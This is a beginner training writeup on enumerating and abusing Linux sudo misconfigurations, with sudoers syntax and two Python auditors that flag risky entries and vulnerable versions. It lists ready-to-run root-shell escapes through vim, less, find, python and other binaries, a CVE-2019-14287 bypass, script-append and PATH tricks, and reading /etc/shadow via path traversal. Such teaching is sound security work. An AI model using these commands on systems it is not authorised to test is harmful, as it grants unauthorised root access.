Sudo Fundamentals

beginner · 20 min · Writeup

Understanding and enumerating sudo privileges

Learning Objectives

  • Understand sudoers file
  • Enumerate sudo privileges
  • Identify sudo misconfigs
  • Check sudo version

sudo (Super User DO) allows users to run commands as other users (usually root). It's the gatekeeper between regular users and root power. Misconfigured sudo is one of the EASIEST privilege escalation vectors in CTFs and real environments.

Think of sudo as a very specific security guard. They check a list (sudoers) to see what you're allowed to do. If the list says "webuser can run vim as root" - that's it, you're root. The guard doesn't know vim can spawn shells.

First Thing to Check

"sudo -l" should be one of the FIRST commands you run after getting a shell. Many privilege escalations come directly from sudo misconfigurations.

Understanding Sudo

bash
# How sudo works:
#   1. User runs: sudo command
#   2. Sudo checks /etc/sudoers for user's permissions
#   3. If allowed, command runs with target user's privileges
#   4. Default target = root

# Configuration file
/etc/sudoers        # Main config
/etc/sudoers.d/     # Additional config files

# NEVER edit sudoers directly - use:
sudo visudo         # Validates syntax before saving

Sudoers Syntax

# Sudoers entry format:
# who where = (as_whom) what

# Examples:
root ALL=(ALL:ALL) ALL
# root can run any command as any user on any host

webuser ALL=(root) /usr/bin/vim
# webuser can run vim as root

backup ALL=(root) NOPASSWD: /usr/bin/rsync
# backup can run rsync as root WITHOUT password

%admin ALL=(ALL) ALL
# Anyone in admin GROUP can run anything

alice ALL=(bob) /usr/bin/less
# alice can run less as user 'bob'

NOPASSWD is Key

Entries with NOPASSWD don't require the user's password. Without it, you need to know the user's password to use sudo. NOPASSWD entries are instant wins.

Sudo Enumeration

bash
# Check your sudo permissions (CRITICAL!)
sudo -l

# Example outputs:

# Full access (easy root):
User admin may run the following commands on target:
    (ALL : ALL) ALL
# → Run: sudo su - OR sudo bash

# Specific commands:
User webuser may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
# → vim shell escape: sudo vim -c ':!bash'

# Restricted but escapable:
User backup may run the following commands on target:
    (root) /usr/bin/less /var/log/*
# → Can escape: sudo less /var/log/syslog → !bash

# No sudo access:
Sorry, user guest may not run sudo on target.

Understanding the Output

Breaking down: (root) NOPASSWD: /usr/bin/vim

(root)         = Run as root user
NOPASSWD:      = No password required
/usr/bin/vim   = Only this specific binary

Breaking down: (ALL : ALL) /usr/bin/systemctl

(ALL : ALL)    = Run as any user : any group
               = Can use -u and -g flags

Breaking down: ALL=(ALL) ALL

ALL            = On any host
(ALL)          = As any user
ALL            = Any command
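The entry format in the Sudoers Syntax section and the lines that `sudo -l` prints from it can be audited mechanically rather than read by eye. The Python below is an added example, not code from the original page: it parses sudoers entries (and the indented `sudo -l` lines, which omit the `who host =` part) into their fields and flags the review points this page calls out: NOPASSWD, SETENV, ALL, wildcards in arguments and the GTFOBins shell-escape binaries. The `SHELL_ESCAPE_BINS` set and the `SAMPLE` lines are constructed from this page's own examples.

```python
import re
from collections import namedtuple
# Binaries this page lists as having a sudo shell escape on GTFOBins, by basename.
SHELL_ESCAPE_BINS = {"vim", "vi", "less", "more", "find", "awk", "nmap", "python", "perl", "env", "man"}
# "who host =" is optional so the indented lines of `sudo -l` output parse as well.
ENTRY_RE = re.compile(r"^(?:(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*)?"
                      r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
Entry = namedtuple("Entry", "who host runas_user runas_group tags commands")

def parse_entry(line):
    """Parse one sudoers entry or `sudo -l` line; the runas user defaults to root."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    user, _, group = (m.group("runas") or "root").partition(":")
    tags, cmds = [], []
    for part in (p.strip() for p in m.group("rest").split(",") if p.strip()):
        # Upper-case tags such as NOPASSWD: or SETENV: prefix the command.
        while ":" in part and part.split(":", 1)[0].isupper():
            tag, part = (s.strip() for s in part.split(":", 1))
            tags.append(tag)
        cmds.append(part)
    return Entry(m.group("who"), m.group("host"), user.strip(), group.strip(), tags, cmds)

def audit(entry):
    """Review points an administrator should look at for this entry."""
    findings = []
    if "NOPASSWD" in entry.tags:
        findings.append("NOPASSWD: no password prompt")
    if "SETENV" in entry.tags:
        findings.append("SETENV: caller may override the environment (e.g. PATH)")
    for cmd in entry.commands:
        prog = cmd.split()[0]
        if prog == "ALL":
            findings.append("ALL: unrestricted command")
            continue
        if "*" in cmd:
            findings.append(f"wildcard in argument: {cmd}")
        if prog.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
            findings.append(f"shell-escape capable binary: {prog}")
    return findings

def audit_lines(lines):
    """Map each parseable line to its findings (an empty list means nothing flagged)."""
    return {ln: audit(e) for ln in lines if (e := parse_entry(ln))}

# Constructed sample mixing sudoers entries and `sudo -l` lines (not from a real host).
SAMPLE = ["root ALL=(ALL:ALL) ALL", "backup ALL=(root) NOPASSWD: /usr/bin/rsync",
          "(root) NOPASSWD: /usr/bin/vim", "(root) /usr/bin/less /var/log/*"]
```

Feed it the indented lines of a real `sudo -l` run or the non-comment lines of /etc/sudoers and /etc/sudoers.d/*; anything with an empty findings list still deserves a GTFOBins lookup, since the binary set here is only the page's list.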

Sudo Version Check

bash
# Check sudo version (CVEs exist!)
sudo --version
# or
sudo -V

# Example:
Sudo version 1.8.31
# → Check for Baron Samedit (CVE-2021-3156)

# Vulnerable sudo versions:
# CVE-2021-3156 (Baron Samedit): 1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1
# CVE-2019-14287: < 1.8.28
# CVE-2019-18634 (pwfeedback): 1.7.1 - 1.8.25p1

# Check if vulnerable to CVE-2019-14287 (user ID bypass)
# If you see: (ALL, !root) /bin/bash
# You can bypass with: sudo -u#-1 /bin/bash
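Comparing the reported version against the ranges above by hand is easy to get wrong because of the pN suffix (1.8.31 sorts before 1.8.31p2). The Python below is an added example, not code from the original page: it parses `sudo -V` output and reports which of the listed ranges contain that version; the `AFFECTED` table is transcribed from the ranges this page lists and is not an authoritative vulnerability feed.

```python
import re

# Affected ranges transcribed from this page. Bounds are inclusive; a None lower
# bound with the given upper bound means "strictly below" (the "< 1.8.28" entry).
AFFECTED = {
    "CVE-2021-3156 (Baron Samedit)": [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")],
    "CVE-2019-14287": [(None, "1.8.28")],
    "CVE-2019-18634 (pwfeedback)": [("1.7.1", "1.8.25p1")],
}

def version_key(s):
    """'1.8.31p2' -> (1, 8, 31, 2); a missing pN counts as p0, so 1.8.31 < 1.8.31p2."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", s.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {s!r}")
    return tuple(int(x or 0) for x in m.groups())

def parse_sudo_version(output):
    """Pull the version string out of `sudo --version` / `sudo -V` output."""
    m = re.search(r"Sudo version (\S+)", output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return m.group(1)

def affected_cves(version):
    """Return the labels of every listed range that contains this version."""
    v = version_key(version)
    hits = []
    for cve, ranges in AFFECTED.items():
        for low, high in ranges:
            in_range = (v < version_key(high) if low is None
                        else version_key(low) <= v <= version_key(high))
            if in_range:
                hits.append(cve)
                break
    return hits

# Constructed sample of `sudo -V` output (first two lines; not from a real host).
SAMPLE_OUTPUT = "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n"

if __name__ == "__main__":
    ver = parse_sudo_version(SAMPLE_OUTPUT)
    print(ver, "->", affected_cves(ver) or "no listed range matched")
```

Distribution packages often backport fixes without changing the version string, so a hit means "check the package changelog and test", not that the host is exploitable.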

Common Misconfigurations

ALL Permissions

bash
# (ALL) ALL or (ALL : ALL) ALL
# You can run anything as anyone

sudo su -           # Switch to root
sudo bash           # Root bash
sudo sh             # Root sh
sudo -i             # Root interactive shell
sudo /bin/bash      # Explicit root bash

NOPASSWD Entries

bash
# NOPASSWD means no password required
# Even restricted commands become easier

# (root) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/bash \;

# (root) NOPASSWD: /usr/bin/python
sudo python -c 'import pty;pty.spawn("/bin/bash")'

Script Permissions

bash
# (root) /home/user/script.sh
# If you can modify the script:
echo '/bin/bash' >> /home/user/script.sh
sudo /home/user/script.sh

# If the script calls other commands without full paths:
# Use PATH manipulation

Environment Preservation

bash
# If env_keep or SETENV is configured:
# Environment variables are preserved

# Check with sudo -l for:
# env_keep += "PATH"
# or SETENV tag

# Then exploit via:
sudo PATH=/tmp:$PATH /usr/local/bin/custom_script

GTFOBins for Sudo

GTFOBins has a sudo section for each binary. If sudo allows a binary, check there first.

bash
# Common sudo escalations:

# vim/vi
sudo vim -c ':!bash'
sudo vim -c ':set shell=/bin/bash' -c ':shell'

# less/more
sudo less /etc/passwd
# Then: !bash

# find
sudo find . -exec /bin/bash \;

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# nmap (old)
sudo nmap --interactive
!bash

# python
sudo python -c 'import pty;pty.spawn("/bin/bash")'

# perl
sudo perl -e 'exec "/bin/bash";'

# env
sudo env /bin/bash

# man
sudo man man
!bash

Always Check GTFOBins

Even if a command seems restricted, GTFOBins often has creative exploitation methods. sudo -l + GTFOBins = frequent easy wins.

Bypassing Restrictions

bash
# Restricted path: (root) /usr/bin/less /var/log/*
# Wildcard might be exploitable:
sudo /usr/bin/less /var/log/../../etc/shadow

# Or escape from less:
sudo /usr/bin/less /var/log/syslog
!bash

# Restricted arguments: (root) /usr/bin/vim /etc/hosts
# Still can escape:
sudo /usr/bin/vim /etc/hosts
:!bash

# Restricted to specific script
# Look for:
# - Writable script
# - Script calls commands without full path
# - Script has vulnerabilities

Sudo Enumeration Methodology

Sudo Attack Flow

  1. Check Permissions: sudo -l (ALWAYS first)
  2. Version: sudo --version (check for CVEs)
  3. GTFOBins: Look up each allowed command
  4. NOPASSWD: Prioritize NOPASSWD entries
  5. Scripts: Check if allowed scripts are writable
  6. Exploit: Use appropriate technique

Knowledge Check

Quick Quiz
Question 1 of 3

What does NOPASSWD mean in a sudoers entry?

Challenges

Sudo Escalation

Challenge
🌱 beginner

Given sudo access to run vim as root, escalate to a root shell using vim's built-in features.


Key Takeaways

  • Always run "sudo -l" first during enumeration
  • NOPASSWD entries don't require password - easiest wins
  • Check each allowed binary on GTFOBins
  • Even restricted commands often have shell escapes
  • Check sudo version for known CVEs
  • Writable scripts in sudo = immediate escalation